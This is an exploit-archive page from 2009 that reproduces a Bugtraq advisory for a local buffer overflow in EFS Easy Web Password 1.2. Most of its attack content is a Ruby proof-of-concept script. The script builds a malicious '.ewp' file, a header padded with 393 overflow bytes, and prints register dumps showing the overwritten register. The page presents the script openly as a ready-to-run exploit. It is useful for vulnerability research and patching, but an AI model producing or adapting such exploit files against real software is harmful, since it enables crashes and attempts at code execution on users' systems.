No account yet?
Home » Exploits » Easy Web Password '.ewp' File Buffer Overflow Vulnerability
Easy Web Password '.ewp' File Buffer Overflow Vulnerability E-mail
Feeds - Exploits
Written by Stack   
Wednesday, 04 March 2009 21:56
Easy Web Password '.ewp' File Buffer Overflow Vulnerability


-\\Bugtraq ID:
33979

-\\Class:
Boundary Condition Error

-\\CVE:


-\\Remote:
No

-\\Local:
Yes

-\\Published:
Mar 04 2009 12:00AM

-\\Updated:
Mar 04 2009 12:00AM

-\\Credit:
Stack



-\\Vulnerable:
EFS Software Easy Web Password  1.2



-\\Discussion
Easy Web Password is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Easy Web Password 1.2 is vulnerable; other versions may also be affected.



-\\Exploit(s)/PoC(s):
The following exploit is available:

===============================================================
33979.rb
^^^^^^^^^
#!/usr/bin/env ruby
# Easy Web Password V1.2 Local Heap Memory Consumption Proof of concept
# http://www.efssoft.com/ewpsetup.exe
# Register
# EAX 00000000
# ECX 04A43C58
# EDX 41414141  ( EDX overwrited )
# EBX 00000001
# ESP 0012A4E0
# EBP 0012F140
# ESI 0012A720
# EDI 2FDE5000
# EIP 00405AB4 EasyWebP.00405AB4
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
moad = gets.chomp.capitalize
puts "Name Of File : " + moad +'.html'
time1 = Time.new
$VERBOSE=nil
Header =   "\x4D\x79\x44\x42\x2C\x43\x6F\x70\x79\x72\x69"+
           "\x67\x68\x74\x5F\x47\x75\x48\x6F\x6E\x67"
    
Bof    =  "\x41" * 393
   
crash =  Header + Bof
 
File.open( moad+".ewp", "w" ) do |the_file|
the_file.puts(crash)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + moad +".ewp :d"
end





-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: This e-mail address is being protected from spambots. You need JavaScript enabled to view it .



-\\References(s)
--Easy Web Password Homepage
http://www.efssoft.com/easy-web-password.htm  (EFS Software)
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff